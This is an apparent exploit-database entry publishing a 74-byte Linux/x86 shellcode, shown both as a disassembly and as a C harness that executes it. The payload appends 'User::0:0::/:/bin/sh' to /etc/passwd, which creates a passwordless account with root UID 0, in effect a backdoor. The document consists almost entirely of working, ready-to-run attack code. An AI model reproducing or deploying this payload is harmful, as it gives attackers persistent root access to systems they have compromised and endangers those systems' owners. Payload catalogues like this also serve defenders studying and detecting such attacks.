# Exploit Title: Linux/x86 - adduser 'User' to /etc/passwd ShellCode (74 bytes)
# Date: 2019-10-12
# Author: bolonobolo
# Vendor Homepage: None
# Software Link: None
# Tested on: Linux x86
# Comments: add user "User" to /etc/passwd
# CVE: N/A
/*
00000000 31DB xor ebx,ebx
00000002 31C9 xor ecx,ecx
00000004 66B90104 mov cx,0x401
00000008 F7E3 mul ebx
0000000A 53 push ebx
0000000B 6873737764 push dword 0x64777373
00000010 68632F7061 push dword 0x61702f63
00000015 682F2F6574 push dword 0x74652f2f
0000001A 8D1C24 lea ebx,[esp]
0000001D B005 mov al,0x5
0000001F CD80 int 0x80
00000021 93 xchg eax,ebx
00000022 F7E2 mul edx
00000024 686E2F7368 push dword 0x68732f6e
00000029 683A2F6269 push dword 0x69622f3a
0000002E 68303A3A2F push dword 0x2f3a3a30
00000033 683A3A303A push dword 0x3a303a3a
00000038 6855736572 push dword 0x72657355
0000003D 8D0C24 lea ecx,[esp]
00000040 B214 mov dl,0x14
00000042 B004 mov al,0x4
00000044 CD80 int 0x80
00000046 2C13 sub al,0x13
00000048 CD80 int 0x80
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xdb\x31\xc9\x66\xb9\x01\x04\xf7\xe3\x53"
"\x68\x73\x73\x77\x64\x68\x63\x2f\x70\x61\x68"
"\x2f\x2f\x65\x74\x8d\x1c\x24\xb0\x05\xcd\x80"
"\x93\xf7\xe2\x68\x6e\x2f\x73\x68\x68\x3a\x2f"
"\x62\x69\x68\x30\x3a\x3a\x2f\x68\x3a\x3a\x30"
"\x3a\x68\x55\x73\x65\x72\x8d\x0c\x24\xb2\x14"
"\xb0\x04\xcd\x80\x2c\x13\xcd\x80";
void main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}